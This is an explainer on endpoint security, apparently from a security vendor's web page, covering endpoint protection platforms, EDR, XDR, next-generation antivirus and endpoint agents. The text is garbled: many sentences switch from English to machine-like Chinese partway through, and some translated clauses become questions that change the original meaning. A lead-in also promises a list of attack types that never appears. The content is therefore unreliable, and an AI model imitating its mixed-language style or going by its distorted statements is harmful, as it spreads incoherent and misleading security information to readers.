Learn about securing a connected-device ecosystem.
Proactive Endpoint Protection Solution端点安全是实时保护访问企业网络的任何设备的过程. Any single device, if left unprotected, 可以被认为是有可能影响整个网络的脆弱环节吗, which is why endpoint security is so critical to an overall cybersecurity program.
According to Gartner, 端点保护平台(epp)提供了部署代理或传感器以保护被管理端点的功能, including desktops, laptops, servers, and mobile devices.
An endpoint is a device or server that connects to a network. In addition to those mentioned above – desktop PCs, laptop PCs, servers, mobile devices – endpoints can include phones, internet of things (IoT) devices like kitchen appliances or thermostats, cameras, 以及任何可以连接到网络并参与数据共享和传输的东西.
我们通常不会想到所有这些设备——尤其是那些我们在个人生活中使用的设备——都可能不安全, 但在某个地方,有人负责保护这个设备以及它所访问的其他网络. 更复杂的是,在工作中使用电子设备可能会影响到个人生活.
For example, if you have work apps like Slack or Google Workspace on your personal phone, your corporate administrators may require you to install certain identity and access management (IAM) Okta或Duo等应用程序,以保护那些连接到公司网络的特定工作应用程序.
EPP是一个平台,它促进了监控代理的部署,以对抗组织网络中每个端点上的恶意软件和其他类型的攻击. EPPs are generally very good at doing what they say: protecting an endpoint. However, 需要进一步的解决方案,以便能够在全网保护方面采取更宏观的立场.
EDR solutions 提供可视性和洞察力,通过识别和报告实时风险来关闭安全漏洞, testing defenses, and – most importantly – detecting endpoint compromise. EDR解决方案应该能够主动识别网络及其用户中的弱点并确定其优先级.
EPP和EDR平台和解决方案之间的根本区别在于预防和检测入侵或攻击. EPP利用代理通过下一代防病毒(NGAV)等技术来帮助防止在端点上执行恶意文件。.
Modern EDR solutions will usually incorporate extended detection and response (XDR) capabilities to go beyond simple detection and response (D&R)通过端点遥测和从外围更广泛的数据收集来提供单窗格的覆盖. 这可以极大地提高组织在攻击链中早期检测事件的能力,并在造成任何或非常小的损害之前关闭攻击.
端点安全通过EPP平台持续监控可疑活动并提醒网络管理员可能的违规行为来工作. 安装在端点上的传感器或代理可以安全地将数据从该端点流式传输到集中式EPP,以便 network traffic analysis can take place and – if necessary – mitigating actions can be taken. Let's take a look at the various types of attacks endpoint data can reveal, thereby determining an appropriate response:
保护网络系统免受未来攻击意味着在调查期间内部提出入侵后的问题.
Monitoring, D&R行动和调查都在EPP的中心位置或仪表板上进行. If a breach did occur of a type listed above, security personnel can execute tasks like blocking malware, vulnerability detection, remotely disabling assets and/or endpoints to contain any fallout, and much more.
Each business and its accompanying security organization has different needs, but the big commonality lies in the technology we all depend on to do our jobs. 因此,让我们看一下端点安全解决方案不应该缺少的一些组件.
访问公司数据和应用程序的设备的数量和类型在过去十年中呈指数级增长. This is due in large part to the pandemic, 但技术的普遍采用也使公司能够从他们称之为家乡的直接地理区域以外聘请人才. In this environment, it’s an understatement to say endpoint visibility is critical.
Digital forensics and incident response (DFIR) 工具在帮助安全团队快速收集和查看跨端点的数字取证证据以及主动监控可疑活动方面至关重要.
With the aforementioned decentralization of the workforce, it's generally accepted that endpoint agents are no longer optional. 安全程序必须能够在任何时间到达任何端点,以有效地应对威胁. Endpoint agents should have EDR capabilities recording key system events, real-time investigative data acquisition, NGAV applications that can terminate threats based on behaviors, active threat prevention, and on-demand mitigation and remediation capabilities.
People must also broaden their capabilities. In this sense, 这意味着终端用户教育应该是安全项目投资策略的关键部分. 与技术成本相比,终端用户安全教育的美元成本微不足道, headcount, and breach-associated costs. Security awareness training 是否可以根据其行业中普遍存在的威胁类型专门为组织量身定制.
NGAV goes beyond traditional antivirus to widen the view on an organization’s endpoints. An NGAV solution detects malware and fileless attacks to prevent attacker tactics, techniques, 和程序(TTPs)以及恶意行为,这些恶意行为要么是有意的,要么是无意的, in fact, properly credentialed.
NGAV阻止隐藏在进程中的恶意代码在被识别之前执行. By leveraging artificial intelligence (AI), machine learning (ML), and other capabilities, NGAV can learn from past behaviors of the endpoints on which it is installed. 然后,它可以更有效地阻止整个端点生态系统中的各种攻击.
端点安全性非常重要,因为它有助于查明并降低整个组织的风险. Real-time detection of threats, remote and virtual-infrastructure monitoring, 快速部署代理只是端点安全可以带来的一些好处.
Endpoint security strategy is also changing, 正如上面所讨论的那样,超越了端点,成为更大的XDR程序的关键部分. This is important if security organizations wish to become more proactive, 检测潜在的即将到来的攻击信号,并在造成任何损害之前关闭它.
Every employee interacts with multiple endpoints every day, including personal devices used for work purposes, hopping on and off the corporate network. A robust monitoring and D&R计划有助于保护资产生态系统免受越来越复杂的破坏, lateral movements, and data theft.
Endpoint Security: Latest Rapid7 Blog Posts
Use Case: Unify Endpoint Assessment